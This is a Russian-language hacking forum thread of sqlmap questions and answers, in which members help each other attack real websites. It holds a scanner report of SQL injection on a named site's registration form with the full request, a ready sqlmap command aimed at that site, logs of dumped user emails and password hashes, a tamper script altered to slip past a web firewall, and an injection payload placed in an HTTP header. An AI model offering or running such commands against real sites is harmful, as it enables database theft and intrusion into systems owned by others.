Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    как можно скормить sqlmap уязвимость в хедере?
     
  2. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак * и потом уже стартовать скульмап:
    Code:
    sqlmap -r "zapros.txt"
    или же скопировать запрос и при старте указать тестируемый параметр/хедер (например User-Agent):
    Code:
    sqlmap -r "zapros.txt" -p "user-agent"
     
    Eidolon and FireRidlle like this.
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Добрый подскажите как вытянуть пароль в blob?
    Пробовал и hex и прочее никак не тянет((
    Code:
    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.21-20-beget-5.7.21-20-1-log'
    Вечно такой результат
    http://joxi.ru/ZrJVX1phw8dRor
    http://joxi.ru/KAgK8yWFEDPj0A
     
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    kacergei and fandor9 like this.
  5. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Приветствую! Проблема такая: при сливе обрезается хеш:
    Code:
    [04:41:49] [INFO] retrieved: '[email protected]','$2y$10$IN1YM1wQoCAAI...
    [04:41:51] [INFO] retrieved: '[email protected]','$2y$10$s7Y6jmxm0Lk5MYk6p727...
    [04:41:53] [INFO] retrieved: '[email protected]','$2y$10$zIlubVWzn/zVAbNef...
    [04:41:54] [INFO] retrieved: '[email protected]','$H\\2y$7KguiftaH$10\\ZByke...
    [04:41:56] [INFO] retrieved: '[email protected]','$2y$10$8ycUx4ZRAtEvOpHS...
    [04:41:58] [INFO] retrieved: '[email protected]','$2y$10$X2cd3HkmJs5f3DsUtzk...
    [04:42:00] [INFO] retrieved: '[email protected]','$2y$10$52HMKZS6r4HT...
    
    Как это побороть? Пробовал hex, no-cast
     
  6. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    С чё ты взял? Зайти в файл дампа и там посмотри, в консоле может и режет, потому что не влазит
     
    vladF likes this.
  7. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Спасибо,разобрался. Просто при сливе базы, данные сохраняются лишь в sqlite файл сессии. Если закрыть консоль, то дамп не сохраняется,нужно ждать пока он полностью не сольется. С помощью --stop 100, сдампил первые 100 строк и глянул, все хорошо)
     
  8. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    ctrl+c нажимаешь и дамп сохраняется
     
    vladF likes this.
  9. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо
    http://prntscr.com/st216j
    Code:
    The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]
    
    Discovered by SQL injection
    
    Attack Details
    arrow_drop_up
    POST (multipart) input REGISTER[EMAIL] was set to 1'"
    
    Error message found:
    You have an error in your SQL syntax
    Code:
    POST /cabinet/registration/?backurl=/cabinet/&register=yes HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
    Referer: https://aachibilyaev.com/
    Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Content-Length: 1021
    Host: aachibilyaev.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
    
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"
    
    g00dPa$$w0rD
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[EMAIL]"
    
    1'"
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[LOGIN]"
    
    1
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[NAME]"
    
    TWSfSopc
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[PASSWORD]"
    
    g00dPa$$w0rD
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"
    
    555-666-0606
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="backurl"
    
    /cabinet/
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="licenses_popup"
    
    Y
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="register_submit_button"
    
    reg
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="register_submit_button1"
    
    register_submit_button1=Регистрация
    ------------Q9OXvYdJGy9b--
     
  10. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    sqlmap.py --url "https://aachibilyaev.com/cabinet/registration/?register=yes" --data="backurl=/cabinet/login/&registe
    r_submit_button=reg&REGISTER[NAME]=asdasd&REGISTER=1*&REGISTER[PERSONAL_PHONE]=+7 (123) 123-12-31&REGISTER[PASSWORD]=1234567&REGISTER[CONFIRM_PASSWORD]=1234567&REGI
    STER[LOGIN]=1&licenses_popup=Y&register_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql

    p.s там фильтрация
     
    Axiles likes this.
  11. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    это через burp? спасибо
     
  12. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    это так в мапу уже пихать
     
  13. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Помогите с тампером для мапы, нужно что б слово from меняло на 'xz'froM
     
  14. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    я бы взял как болванку тампер
    Code:
    #!/usr/bin/env python
    
    """
    Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
    See the file 'LICENSE' for copying permission
    """
    
    import os
    import re
    
    from lib.core.common import singleTimeWarnMessage
    from lib.core.enums import DBMS
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.HIGHEST
    
    def dependencies():
        singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
    
    def tamper(payload, **kwargs):
        """
        Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
    
        Tested against:
            * Microsoft SQL Server 2005
            * MySQL 4, 5.0 and 5.5
    
        Notes:
            * Useful to bypass weak and bespoke web application firewalls that
              filter the equal character ('=')
            * The LIKE operator is SQL standard. Hence, this tamper script
              should work against all (?) databases
    
        >>> tamper('SELECT * FROM users WHERE id=1')
        'SELECT * FROM users WHERE id LIKE 1'
        """
    
        retVal = payload
    
        if payload:
                retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
    
        return retVal
    теперь в регулярке пишите
    Code:
    retVal = re.sub(r"\s*FROM\s*", " \'xz\'froM ", retVal, flags=re.IGNORECASE)
    и сохраняете под другим именем.
     
    Eidolon, FireRidlle, dmax0fw and 3 others like this.
  15. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Парни как понять какую технику нужно использовать? --technique
     
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Всё просто, вот варианты:

    Code:
    B: Boolean-based blind
    E: Error-based
    U: Union query-based
    S: Stacked queries
    T: Time-based blind
    Q: Inline queries
    Использовать так:
    Code:
    --technique=BE
    А вообще эти моменты расписаны все в sqlmap wiki usage на github'e
    Там все ключи всё расписано

    PS: а как понять, так просто голова+руки
    К примеру что бы сэкономить время не хочешь проверять на Time-based blind, то --technique=BEUSQ
    или наоборот если слепая то --technique=T
    Надеюсь мысль понял) (PS сорри что квадратно объяснил, на англ проще)
     
    Axiles likes this.
  17. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    кто сталкивался с таким? http://prntscr.com/svuovq
    уязвимость типа boolean-based blind
    открывается бд ,но не полностью ,открывает часть таблицы,а дальше вот это
    [14:29:22] [INFO] retrieving the length of query output
    [14:29:22] [INFO] retrieved:
    [14:29:26] [INFO] retrieved:
    [14:29:30] [INFO] retrieving the length of query output
    [14:29:30] [INFO] retrieved:
    [14:29:33] [INFO] retrieved:
    [14:29:36] [INFO] retrieving the length of query output
    [14:29:36] [INFO] retrieved:
    [14:29:40] [INFO] retrieved:
    [14:29:44] [INFO] retrieving the length of query output
    [14:29:44] [INFO] retrieved:
    [14:29:47] [INFO] retrieved:
    [14:29:50] [INFO] retrieving the length of query output
    [14:29:50] [INFO] retrieved:
    [14:29:53] [INFO] retrieved:
    [14:29:57] [INFO] retrieving the length of query output
    [14:29:57] [INFO] retrieved:
    [14:30:00] [INFO] retrieved:
    [14:30:04] [INFO] retrieving the length of query output
    [14:30:04] [INFO] retrieved:
    [14:30:07] [INFO] retrieved:
    [14:30:11] [INFO] retrieving the length of query output
    [14:30:11] [INFO] retrieved:
     
  18. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Попробуй с --hex
     
  19. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Уязвимость в заголовке
    Code:
    Origin: -1;select pg_sleep(0); -- 
    Как правильно вставить в sqlmap?
    --headers="Origin:*" не прокатывает
     
  20. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0